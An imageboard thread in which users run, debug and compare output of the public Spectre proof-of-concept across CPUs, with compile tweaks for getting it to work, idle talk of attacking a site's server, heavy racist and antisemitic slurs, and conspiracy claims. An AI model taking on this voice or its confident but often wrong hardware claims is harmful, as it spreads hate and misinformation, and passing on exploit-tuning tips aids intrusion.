0xffffffffffdfed83... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed84... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffffffffdfed85... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfed86... Success: 0x4F=’O’ score=2 Reading at malicious_x = 0xffffffffffdfed87... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed88... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfed89... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfed8a... Success: 0x66=’f’ score=2 Reading at malicious_x = 0xffffffffffdfed8b... Success: 0x72=’r’ score=2 Reading at malicious_x = 0xffffffffffdfed8c... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfed8d... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffffffffdfed8e... Success: 0x65=’e’ score=17 (second best: 0x05 score=6)Reading at malicious_x = 0xffffffffffdfed8f... Success: 0x2E=’.’ score=2

By that I mean that it might still be affected but since they wrote this for i7 it is calling too much memory for the old processors to handle. I'll go back to the paper.

Ok thanks for confirming. I guess I will just sit back and watch the show.

x86 was a mistake

They were grossly negligent of not anticipating every possible way that it could leak data? I'm looking at the papers, and it's some pretty esoteric shit. Determining the value in a byte by picking out which cache line was filled by an instruction that didn't execute? If you're telling me that an attack that took 25 years to be discovered was so obvious that it's negligence, you are full of shit.

In order for any of these to work, you have to be able to execute code on the target machine. JS may be vulnerable, and is really the only attack vector for the vast majority of these machines, which probably have much easier JS vulnerabilities to exploit.

Really, it's the cloud providers who are and should be shitting themselves. This allows customers to spy on one another.

Reading 40 bytes:Reading at malicious_x = 0xffffffffffdfeeb8... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeeb9... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeeba... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeebb... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeebc... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeebd... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeebe... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeebf... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec0... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec1... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec2... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec3... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec4... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec5... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec6... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec7... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec8... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeec9... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeeca... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeecb... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeecc... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeecd... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeece... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeecf... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed0... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed1... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed2... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed3... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed4... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed5... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed6... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed7... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed8... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeed9... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeeda... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeedb... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeedc... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeedd... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeede... Success: 0xFF=’?’ score=0 Reading at malicious_x = 0xffffffffffdfeedf... Success: 0xFF=’?’ score=0

Phenom II X4 955 C3 stepping (Deneb)

Cloud providers and web users. Javashit is an STD vector!

So if your a VPS provider you have to be shitting bricks right now.

Post pics of the terminal, I don't believe it.

kek
enjoy your psp.

Note I'm and had the same result on AMD A6-5400K APU.

I'm confused now but since that phrase is stored in a secret array, I guess it's broken when the result pops up on execution?

My APU is 15h, it doesn't ship with (((PSP)))

phenom II doesn't have PSP you dumb nigger

I think that means he is safe.

fucked

WTF I LOVE THE ZOG NOW

i wonder if microsoft is going to patch XP again like they did the last massive vulnerability

I've been messing around with GCC 5.4.0 Cygwin, notes:
With no optimization or -O1 : Works.
-O2 or -O3 Fails.

Cygwin run on i5-540M with no optimisation and -O2. This is weird.

Everything is fucked.

This is now a happening thread

i think that means your good

Your safe

This guy is fucked

No it means it successfully read the secret. It also means you should turn off javascript and never turn it on again.

AMD wins the award with jewtel for biggest idiots to use the x86 architecture.

ivy bridge inside of a Xubuntu 17.04 LTS VM inside of VirtualBox.

What are you talking about? The exploit failed. It got back nothing.

If you see these your fucked. The code can read back the magic word.

You're all retarded if you dont think AMD chips are effected as well

amd.com/en/corporate/speculative-execution

So, how far back of Intel generations does specter affect?
as far as I know it may be core duo and back.

affects all intel cpus since 1995

Anything running x86 with an MMU. So preety much every x86 proccessor.

fuck off, Intel pajeet
the problem isn't speculative execution but how Intel implemented it

anyone have a Pentium 4 they could test this on? lol

By that I mean that this particular code does not execute on those platforms. said, p6 so ...

Doesn't that apply specifically to Meltdown? Specter is kind of unknown from what I can tell.

Oh you are right, those are two different exploits. Carry on.

github.com/torvalds/linux/commit/00a5ae218d57741088068799b810416ac249a9ce#diff-678874d00bf0df04f6f427f16f1dea36R926

Archive everything archive.fo/pXsPA

Intel on suicide watch

INTEL BTFO

Should someone tell him about this?

blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/

ITS HAPPENING

AMD explicitly states they're effected on their website you retard

it's affected you retarded poonigger

Phenom 9600 here: did you use compiler optimizations? I found that it succeeded with no optimizations and failed with optimizations.

The Linux kernel patch was for meltdown, which was only an Intel problem. The code being run in this thread is for spectre, and it appears to be an everyone problem (all processors that do speculative execution).

I forget how savage Linus can be when he wants

That line was deleted

You should have put
You stupid nigger get your grammer correct before you correct other people.

here (A6-5400K), it failed with 0xFFs on both standard compile and -O2.

that's funny because all the results of the code being run in this thread show intel is fucked and amd is okay. none of the amd posts show the secret words. all of the intel posts show secret words.

also aren't they taking a while pushing this kernel update down the chain?
*buntu LTS is still unpatched. this has been out 8 hours now.

And this is why on die instruction scheduling is cancer incarnate. Fucking anticipate commands at compile time or get rekt.

x200
code does not work.

If your getting back nothing but "0xFF=’?’" then this does not effect/affect you.

"it is affected you retarded poonigger" is correct english, i could have used a comma "it is affected, you retarded poonigger"

"it has affected, you retarded poonigger" is incorrect you fucking pajeet.
"it has because you poo on the street that you are a poonigger" is not valid english
"it is because you poo on the street that you are a poonigger" is valid english

can someone give me a quick rundown on what the stats mean ("score", "second best", etc.)?

Phenom II guy here: can't read a single character from the secret message with -O0 to -O3 and also -Os, -Ofast and -Og

I think, yeah.

It was able to read back the magic word completely.
Your Fucked.

If at the beggining of the line you get a malicious_x you are vulnerable. If you get what got then you are safe. I think a better question is how the hell the x200 is safe from this cancer?

It's predicting what the magic word is - second best means just that, it's the second closest value it could get.

source?

If score isn't 0, remove your motherboard and CPU, put it in a bin, and light it on fire.

But user, if you get 0xFF's instead of anything secret, the exploit doesn't seem to be working properly.

Also the same happens on a Thinkpad R60 but not on X201.

and replace it with what? your not even going to be able to get a powerpc cpu in a few days. i doubt they have that many in stock or produce them fast enough to meet the demand this is going to cause.

It's Cygwin, you nigger.

I don't fucking know man. I got hardened gentoo. It might be the savior of western civilization.

There's plenty of old powerbook mac's for people to use with webbrowsing. The real question is what the servers are going to do, that will allow them to keep up the modern cancer that is the internet. If we went back to websites like 8ch alone then it would be ok. But the pajeetscript filled sites like goybook are going to get fucked.

By the same, I mean SIGILL

none of them rely on single server performance, they're all loadbalanced across a shit ton of servers. if they take a 30% performance hit it means they're going to need 30% more servers and have to pay 30% more to run their cancer.

Then what would the routers be though......

The electrical grid is going to melt down from everyone dusting off and firing up old G5 Quad's.

seems like amd is actually vulnerable, so the question remains are linux users safe or could you rewrite the exploit for it?

Not if they use the old g4 laptop powerbook format ones that run hardened gentoo. That would severely decrease electricity usage. Combine that with things like the eZ80 and consoles running powerpc to supplement phones and you are golden for clients since ARM is not a option. But the servers are going to get rekt.

I aint a Holla Forumsnigger Zionist though so fuck off.

well clearly they haven't dropped the kernel update yet. all linux machines are vulnerable at the moment.

What does that have to do with anything? I don't care if you are the most badass trump Holla Forumsack or the biggest giga-kike. When it comes to technology it is either possible or it is not and both deserve security and privacy. well MAYBE not the giga-kikes, but then the Holla Forumsacks couldn't have it either as it wouldn't be secure.

You could probablly rewrite it to work on mac osx too.

also another gem

THE PATCH EXEMPTING AMD FROM KPTI WILL BE IN 4.15
AMD BTFOing everyone.

Lots of @INTEL.COM faggots have access to the kernel tree. They where trying to put that "all cpu's" shit in as damage control.

What about all the intel users below Pentium pro?

Anything with an x86 cpu and an MMU is affected. Don't listen to the cianigger A.I trying to D&C.

fuck them too apparently according to intel. buy a new i9 like a good goy

APPLE fixed this last month in OS X UNIX(tm)

LINUX BTFO

twitter.com/aionescu/status/948609809540046849

>tfw you bought an (((Intel))) processor before you knew about (((who))) owns it.

That's only a temporary fix like the linux patch. You can still exploit it if git gud.

That is more concerning then anything else here. Why have they known about this and not told anyone else?

NDA's are not uncommon in the corporate world.So Apple using them is SOP. What would really be concerning is if supposed "Open Source" developers signed them. They would be protecting (((them))) for FREE.

I meant specter. Sorry for getting it confused.

R5 1600 here.
PREPARE YOUR ANUS

I wonder what kind of year 2018 is going to be. We are on day 3 and all of Holla Forums's fears have been validated beyond anything that could have been hoped for. Death to botnet.

now is not the time to buy a new processor.

the cpu market is going to be fucked. everyone is going to be waiting for the next generation of processors that aren't fucked by these problems. on the other hand, maybe the prices will drop for these now trash processors?

Until we get confirmation this is being used for bluebeam, Holla Forums's worst fears haven't come yet.

at least I can reuse my new motherboard I guess, unlike intel customers.

I was dragging my feet on installing uMatrix, thinking uBlock was good enough, but now I've added it. Hopefully that'll mitigate/fend off web exploits for long enough for a Spectre patch to come through.

ixquick literally overloaded and is in shutdown mode now

Disable images, disable fonts in umatrix/ublock, disable javascript, and don't play videos on the internet. That's your best bet to fend it off for as long as possible. But you still will get rekt if your browser's CSS or text encoding is shit pajeet tier quality.

How would this execute through images and fonts in any realistic scenario?

i tried the same thing on my librebooted x200 running on usb ubuntu and got the same result

How does this tie into project bluebeam? They disable the internet and fake God or Ayyliems?

It's all a fucking botnet.

Well they would be using the audio device of every computer on the planet for the sound of said project. So that would be how it ties in. No need to disable internet, just use the audio.

HE TRIED TO WARN US

fuck, how am I going to watch porn now????

eZ80 proccessor built by hand and ASCII art. Or print it out.

ASCII porn, nigger.

CPU: Intel Core i5-3230M

I sold my Bitcoins for this. Kill me.

CSS can be abused theoretically
Not sure how but I suppose it depends if your browser has advanced hardware acceleration.

I don't block images since I disabled hardware acceleration.
I don't block CSS either because it's still fairly limited.

https-strict: * true
https-strict: behind-the-scene true
matrix-off: about-scheme true
matrix-off: addons.about-scheme true
matrix-off: behind-the-scene true
matrix-off: chrome-extension-scheme true
matrix-off: chrome-scheme true
matrix-off: localhost true
matrix-off: opera-scheme true
referrer-spoof: * true
referrer-spoof: behind-the-scene true
ua-spoof: * true
ua-spoof: behind-the-scene true
* * * block
* * cookie block
* * frame block
* * media block
* * other block
* * script block
* * xhr block
* 1st-party * allow

BitTorrent. Burn to CD. Then bring to offline, air gapped machine dedicated to playing multimedia.

fails with -O2 and higher

The libraries that execute via software instead of hardware acceleration can be abused too.

OK, SO SOMEONE CAN TARGET THE 8CH SERVER WITH SPECTRE RIGHT???
What the fuck do I do with my board, should I just wipe it???

there's no point now, linux kernel patches haven't hit the repo's yet. if your going to nuke and re-install wait until the patches are in the repo's.

I would hope that codekike would have been smart enough to get off of x86 long ago after the first hacking incident.
otherwise you need to make sure that the entire board, archive, and account credentials are deleted. you are using a fake email/name and seven proxies right?

Target it and implement your own botnet.

There's no Spectre patch dude, read the thread.

not even using an email.

have been recently, but not in the past. Also, aren't my proxies gonna get owned soon?

Then again he never did switch to openbsd from freebsd.....

Ha shit.
I guess I'll need a computer just for browsing the web the normal way.

Yes they are, actually everything is going to either get patched or pwned soon. Literally nothing is stopping someone from taking over the world within an hour now by holding all computer systems hostage. Welcome to 1984.

Tor has always.

So -O2 and higher seems to mitigate the attack and the "safe and stable" -O1 and lower are getting pwned lmao.

literally no patch for spectre yet though. holy fuck. this is gonna be insane.

Rustaceans aren't spotted for once I wonder why.

That part of the happening hasn't even begun.

ghacks.net/2017/11/22/how-to-enable-first-party-isolation-in-firefox/

No, they can't, to exploit Spectre you need the program to be running locally. With Meltdown it can be executed remotely

WHO /LEAVING THE INTERNET FOR A MONTH/ HERE?
I've got like a hundred anime and movies in my backlog. Hundreds of textbooks... Time to get comfy.

Oh wait, 8ch runs on its own dedicated hardware doesn't it? I guess it's a bit safer than some shit in the cloud. Cloud servers are FUCKED.

Why would the 8ch server be running someone else's JS?

Why would this be necessary if PTI is already enabled though? Does Firefox even need to access kernel memory that often? it probably does considering its been taken over by Pajeets

There are several methods of input to 8ch's servers. There is the hash generator taking input of filenames, the comment/name/email/subject inputs, the login and password fields for hotpockets, and the RSS fields listening for inquiry from clients. It's possible if you are dedicated enough to get code execution via RSS or filename inputs. Don't you dare fucking do it though. This is only relevant if codekike is still using x86 however as code execution isn't going to do you a whole lotta good if you can't escape whatever he is using to isolate said functions on the servers.

Thanks. I needed that laugh.

Sounds like a easy victory.

You are a fucking retard

No. It's just a PoC so there is probably some essential part of it being optimized out.

kek so it's UB to boot

What could you show everyone that would be universally understood across the globe though? A picture of anti-kike wouldn't do much good as not everyone understands that. This is literally bablon tier bullshit you are talking about. Don't do it.

I'm fairly certain, now that I've read about the attack, that KARL doesn't help. OBSD needs its own patch, but your average OBSD server is probably safe because how many of them allow untrusted code to run on them?

Every processor that does speculative execution (multiple dispatch, out-of-order execution, branch prediction, etc) could be affected. Intel is in the hot seat because they aren't doing security check on reads that haven't happened yet (and it takes some coercion to determine the data that was read as it is not exposed in the logical state of the machine).

goatse with an Intel tramp stamp?

Well this specific exploit is for x86 based proccessors, don't even get me started on the other piles of shit. It's all shit, but x86 is the heaping pile of shit that will bring the house down.

How exactly would that communicate the evilness of kikes? You know you could use audio too?

seL4 is also patching the meltdown exploit.

I realize the patch doesn't seem to negatively affect gaming performance, but I run Windows in a VM with hardware passthrough. Will I see the performance hit because of that?

Yes, why aren't you running it via wine yet? Almost everything but directx12 games work via it now. You have no excuse.

Because
is a lie and you and I know that. It's getting a fucking lot better than it was, but there's still a lot that doesn't run.

Ho-lee-fuck. This is a really bad week to be a computer janitor.
I don't even store passwords in the browser and I've completely disabled javascript until this all blows over. God damn, they really fucked up. Intell fucked up the worst. HN is filled with fucking retards that don't understand the difference between the rogue cache load and the bounds check bypass bugs.
Intel fucked up bad. Never thought I'd see errata like this anymore.

They admit they're affected but there is a

Google had knowledge of this since 2016
siliconangle.com/blog/2016/04/07/in-blow-to-intels-data-center-reign-google-endorses-ibms-power-chips/

Archive archive.fo/8MRFQ
And holy shit, everybody is pwned already then.

Oh the article doesn't say that you faggot. It just says they wanted to get away from x86. The (((ME))) has been known about for a while now so that's probably why they wanted to get away from it.

This bug has been there for 20 years.

>inb4 lurk moar
So the main way that meltdown attacks the computer is by running a script on the internet browser? I assume that's not the only way. So won't patches to internet browsers mostly fix this with most users in the short-term?
I guess going on from that thinking, would every website you usually visit be exempt from this or would there be ways for someone to infect a site like Holla Forums so that even though it's presumably safe now, in the future it could be potentially dangerous?

>googleprojectzero.blogspot.fi/2018/01/reading-privileged-memory-with-side.html
So AMD only has the vuln in a single process right now?

There are three bugs.

It has nothing to do with the management engine.
Everyone hates x86. This shitstorm just confirms that the neckbeards are indeed wise.
marc.info/?l=openbsd-misc&m=119318909016582&w=2
Linus has some good ones too but I'm too lazy to find a link, Theo's should be good enough.

There are three bugs. Meltdown is an intel bug, it comes with some IA-32 remnant shit with specullative execution and caches. The other two Spectre bugs are basicallly branch predictor fuckery. They're applicable to more modern processors and shit like javascript when it comes to normalfag computing and mitigation probably needs to be done in the browser first and foremost.

What does it mean? I'm on a T60 w/ T2400 BTW...

What a fucking spastic.

You've been Koding with Karlie.

if muhcpu.dev = `Intel then raise Just_fuck_my_shit_upOCaml. Not an assignment.

It means you're not vulnerable to this Meltdown POC.

That faggot was clearly trying to write C++, you dumbshit pajeet. Hell, it was probably you.

Brutal. Linus was brutal too.

I wonder how many negative comments are being straight deleted on hacker news. Like not even showing that they are deleted. I bet it is a lot, clueless morons. They all think the CEO of Intel didnu nuffin wrong.

The word 'OCaml' refers to the immediately preceding code. Which is written in OCaml. That faggot successfully wrote C++. That it's buggy is pretty normal for C++.

why is that?
t. baka that doesn't program

So this is the tribulation...

Only when you're a pajeet.

it has a lot of instructions that are attractive nuisances: they're slower than more roundabout ways of doing the same thing.
it's just a mess and not fun at all, compared to ARM.
performance has been stagnant for nearly two decades now -- and the key driver of the illusions of performance gains have just been revealed to be massive security holes.
I'm buying NVDA stock. Future is GPUs.

That's it. Wii Linux is my daily driver from now on. I'm getting out of here before shit *really* hits the fan.

That's basically intel by another name. You have to go back.
>>>/g/

GPU speed comes from vectored operations. CPU speed comes from snake oil. The snake oil is about to go bad. Invest in vectored operations.

GPUs do prediction shit too though right?

stackoverflow.com/questions/6582236/branch-predication-on-gpu
^ url is not a typo

I think we need an OS with a JIT compiler like TempleOS, except in place of HolyC we should have an IR bytecode like LLVM. The only explicit native instructions are to bootstrap the system, and the others are under control of the JIT's output. That way it's impossible to craft malicious assembly programs, and then it's trivial to port the existing C/C++ software without changing anything.

Someone get Zeloof to make us a non-botnet CPU already

That's called virtualization / a virtual machine.

Yes you gigantic faggot, GPU's have the same cancer as CPU's for branch prediction but with more dedicated and optimized RISC implementations. So it isn't as noticeable but still happens because in the end you are going through an intermediary langauge like CUDA or OPENGL which are shit for security, or rather for anticipating every state of the graphics all the times. This user is correct though.

(((Nvidia))), (((jewtel))), and ((((AMD))) are all owned by the same (((people))). Why do you think we are in this mess?

The few times being on a politically incorrect website helps, when (((corperations))) go full shut it down mode in unison.

Indeed. Without the security risks of running on the native cpu under hypervisor.

But for that you are going to need a whole hell of alot of GFLOPs of performance.

There are certain startup costs in this method, but I am not so convinced about significant runtime penalty, until I see I see such system put into practice and measured.

Well yea, someone needs to invent a CPU that doesn't use out of order operation baby hand holding schedulers. Compilers need to be re-wrote that anticipate the order of execution of software. Said compilers should also parellelize properly for the code while maintaining execution order over many cores. Said CPU should be RISC based and not using much microcode or it should be FOSS microcode for the compiler/devs to be able to control it better. No legacy shit like the 8086 ISA and include acceleration for things like webm and SIMD on the die.

AND NO INTEL, AMD, OR NVIDIA. That's for sure.

How do I explain to my family that the computers they got for Christmas are all completely fucked? Man, the botnet really puts an emotional burden on you.

return them if you can.

I bought a haswell laptop and built a ryzen system within the last 6 months.
I knew I should have stuck with my old phenom.
just fuck my shit up

You can keep them for vidya, just don't do anything secure or needing security on them like web browsing or banking online. Looks like the whole world just got their shit fucked up.

your ryzen system will be ok once the firefox patch comes in that obfuscates memory timing. the haslel is fucked as far as I can tell, IDK what I'll do with my old laptop either. waiting for Ryzen thinkpads I guess.

It really sucks, I just put a great panel in it and got a nice wifi card. guess I'll put off the other mods for now.
is there any good AMD laptops? the only times I come across them is because they're dead or close to it.

Yep. Intel were being too smart for their own good I suspect it may have been intentional though, and we really need dumb and predictable hardware. Also, I do wonder why this cannot be fixed by firmware microcode update.

Doing that for 20+ years of processors across God knows how many motherboards via BIOS update is simply out of the question.

Because of what is underneath the microcode and on the silicone can not be changed. Cancer is cancer and there is no changing that aspect of the x86 architecture when it comes to the insecurity of the MMU.

From what I heard, it was just that they "couldn't", but I'm not sure of the technical reason why. I suppose their look ahead pipelining is done at the silicon level?

Yes it is done at the silicone level you giant faggot. Why do you think this effects every intel cpu?

You learned about an MMU yesterday, and now you're the expert. Amazing.

Libreboot X200T with Debian Stretch, also "illegal instruction" under several -O settings. It doesn't need to be compiled with an i386 toolchain does it? Also a kernel fix hasn't yet landed for meltdown.

I suspect there's probably issues with the POWER-based CPUs at this point. Confirmation would be of interest.

♥ De Raanter.

Move to Akihabara.

One of the original XBOX hacks did this because the system failed to verify them, and the font handler was exploitable. Mind, the overall system was insecure, but it can happen.

if you debug it using gdb it shows that the program breaks at line 64

B-but m-uh safety!!!!

all pre windows10 versions have exploitable font security.stackexchange.com/questions/91347/how-can-a-font-be-used-for-privilege-escalation

All windows versions have an exploitable everything. Their not the ones to be worried about as theres twenty thousand different ways to infiltrate them. The real worry is unix systems.

gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2310736

To those who are getting the "illegal instruction" error, try this. Unfortunately it seems to be a matter of tuning for different systems, not that some of them are safe.

The vulnerabilities discovered in the Intel CPUs will never be exploited, as the Intel Management Engine already provides all the necessary backdoors.

So this has been out since last year? If I'm worried about it I will be affected already, right? Or not.

Guess he was proven right.

This proves i was right from the beginning 17 years ago, privileges, execution modes are meaningless, antiviruses, firewalls are useless shit trojan backdoors, and there is no such thing as security or privacy on a computer that is plugged in a network accessible from outside.
All that was needed is a microkernel, or even exokernel like in Minix3 that is used in your intelme trojan botnet integrated in your pc and enabled by default.

So the AMD Piledriver CPUs are largely safe from these attacks?

That is correct

My fucking sides.

Well you get what you pay for.

Yeah, avoid that security bug by using an outdated as fuck kernel that undoubtedly has a plethora of even worse security bugs.

Granted, using a PowerPC based game console isn't a bad idea in theory, but nobody cares enough to maintain development.

Okay question from a newfag who is kinda concerned: mum uses a windows XP tower running an intel graphics card: how do I make sure she doesn't get fucked over. Thanks.

Install Linux

*boings in front of you*

where do you think you are you undergassed oven dodger

Only Ryzen has good enough batter performance. FX laptops are shit. Just wait for more Ryzen laptops.

Newsflash: 486 has a cache and a branch predictor. It's likely just as vulnerable.

lol

If it's just rdtscp and clflush then you should be able to replace them with intrinsics for whatever are the equivalents on PowerPC. I would expect every modern-ish ISA to have such basic instructions.

it is Read Timestamp Counter that gets the number of clock ticks since power on from cpu

The last two generations (Carrizo and Bristol Ridge) were pretty decent. They didn't beat any performance records, but AMD did a great job on improving energy efficiency, squeezing decently clocked faux quad-cores into thermal envelopes where Intel could only put two cores. Add a decent iGPU into the mix, and you could get a thin and light laptop that would outperform Intel's immediate competition under most multithreaded CPU loads and game pretty well for its size, at a decent price.
It's a fucking shame AMD didn't get more design wins. Those APUs deserved to be used more.

LOL @ gexcolo.
Cockboxes are about to penetrate each other!

386 executes instructions one by one in strict program order, so it's probably immune. And it does have an MMU.
kek

FPGA is immune too, and Atmel microcontrollers

Having trouble getting any of the code on that github link to work.
Anyone got it to run on
Architecture: x86_64CPU op-mode(s): 32-bit, 64-bitByte Order: Little EndianCPU(s): 2On-line CPU(s) list: 0,1Thread(s) per core: 1Core(s) per socket: 2Socket(s): 1Vendor ID: GenuineIntelCPU family: 6Model: 23Model name: Intel(R) Core(TM)2 Duo CPU P8400 @ 2.26GHzStepping: 6CPU MHz: 2266.806BogoMIPS: 4533.61Virtualization: VT-xL1d cache: 32KL1i cache: 32KL2 cache: 3072KFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf eagerfpu pni dtes64 monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr pdcm sse4_1 lahf_lm tpr_shadow vnmi flexpriority dtherm

try this:

gcc -march=core2 -O0 -o spectre spectre.c && ./spectre

but first, go into the source code and edit these 2 lines:

89c89
< time1 = __rdtscp( & junk); /* READ TIMER */
---
91c91
< time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
---
but first g

rdtscp(&junk) => rdtsc()

your trannyboot machine is not safe with spectre

now i want to know if it's safe from meltdown

This is literally impossible. You never know which way the control flow will go before actually executing the code.

I surely don't want to hear audio to that one.

Well, put in the right perspective they're usable. For Holla Forums posters, half of whom are using old c2d thinkpads, the perf is not a big issue.

How is Intel going to patch this? Update MINIX?

pcworld.com/article/3245508/components-processors/intel-responds-to-the-cpu-kernel-bug.html

When the fuck is my distro going to update Firefox?
Firefox needs the JS timer gimp to stop Spectre. Why is Fedora sitting on its ass?

still not working

pathetic

post screenshots then

A Friend on MacBook pro has severe performance issues after a security fix from last month (especially when using 3d rendering software) could that be related?

saying there is too few arguments to function. Should I use the original code from the paper or one github link.
errors from original
spectre.c: In function 'readMemoryByte':spectre.c:67:7: error: too few arguments to function '__rdtscp' time1=__rdtscp(); ^In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/x86intrin.h:27:0, from spectre.c:8:/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/ia32intrin.h:112:1: note: declared here __rdtscp (unsigned int *__A) ^spectre.c:72:7: error: too few arguments to function '__rdtscp' time2=__rdtscp() - time1; ^In file included from /usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/x86intrin.h:27:0, from spectre.c:8:/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/ia32intrin.h:112:1: note: declared here __rdtscp (unsigned int *__A) ^
error for code lined in github
spectrelast.c:50:29: error: "80" may not appear in macro parameter list #define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time

rdtscp(&junk) => rdtsc()

rdtsc not rdtscp

also i used the code from this thread instead of github

The output does not have success.
Reading 40 bytes:Reading at malicious_x = 0xffffffffffdfeef8... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfeef9... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfeefa... Unclear: 0xFD=’?’ score=999 (second best: 0xFB score=999)Reading at malicious_x = 0xffffffffffdfeefb... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfeefc... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfeefd... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfeefe... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfeeff... Unclear: 0xFF=’?’ score=999 (second best: 0xFA score=999)Reading at malicious_x = 0xffffffffffdfef00... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef01... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef02... Unclear: 0xFE=’?’ score=999 (second best: 0xFC score=999)Reading at malicious_x = 0xffffffffffdfef03... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef04... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef05... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfef06... Unclear: 0xFD=’?’ score=999 (second best: 0xFC score=999)Reading at malicious_x = 0xffffffffffdfef07... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef08... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef09... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef0a... Unclear: 0xFF=’?’ score=999 (second best: 0xFC score=999)Reading at malicious_x = 0xffffffffffdfef0b... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfef0c... Unclear: 0xFF=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfef0d... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef0e... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfef0f... Unclear: 0xFD=’?’ score=999 (second best: 0xFC score=999)Reading at malicious_x = 0xffffffffffdfef10... Unclear: 0xFF=’?’ score=999 (second best: 0xFE score=999)Reading at malicious_x = 0xffffffffffdfef11... Unclear: 0xFE=’?’ score=999 (second best: 0xFD score=999)Reading at malicious_x = 0xffffffffffdfef12... Unclear: 0xFE=’?’ score=999 (second best: 0xFB score=999)Reading at malicious_x = 0xffffffffffdfef13... Unclear: 0xFF=’?’ score=999 